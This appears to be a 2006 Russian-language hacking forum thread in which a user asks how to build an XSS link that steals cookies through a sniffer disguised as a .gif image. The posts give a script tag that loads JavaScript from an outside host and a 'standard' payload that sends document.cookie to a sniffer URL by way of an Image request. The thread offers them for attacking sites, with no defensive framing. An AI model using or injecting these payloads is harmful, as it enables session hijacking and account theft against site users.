Xss

Discussion in 'Болталка' started by Mikel21, 27 Aug 2006.

  1. Mikel21

    Mikel21 Guest

    Reputations:
    0
    Привет!

    Обычно XSS атака выглядет так </a><script src="http://sdf.ru/dsf.js"</script><a>. А если я сделал скрипт для приёма куков через .gif. Т.е. kartinka.gif значит будет <script src="http://sdf.ru/dsf.gif"</script>

    И еще нужно xss только через осла будет работать?
     
    #1 Mikel21, 27 Aug 2006
  2. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    976
    Reputations:
    783
    Лол, вообще то почти все снифферы через .gif или .jpg.
    Есть коды, которые заставляют работать JS и в опере, и в огнелисе. Но приписать их к обычной ссылке врядли удасться.
    Хоть бы теги правильно закрыл
     
    #2 .Slip, 27 Aug 2006
  3. Mikel21

    Mikel21 Guest

    Reputations:
    0
    а тогда как правильно ссылку составить, скажи пожалуйста!
     
    #3 Mikel21, 27 Aug 2006
  4. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    976
    Reputations:
    783
    Что то это не обычно. И закрытый тег <a> вообще не к месту.
    Стандартный скрипт для xss выглядит вот так:
    <script>img = new Image(); img.src = "ссылка на сниффер"+document.cookie;</script>
     
    #4 .Slip, 27 Aug 2006
(You must log in or sign up to post here.)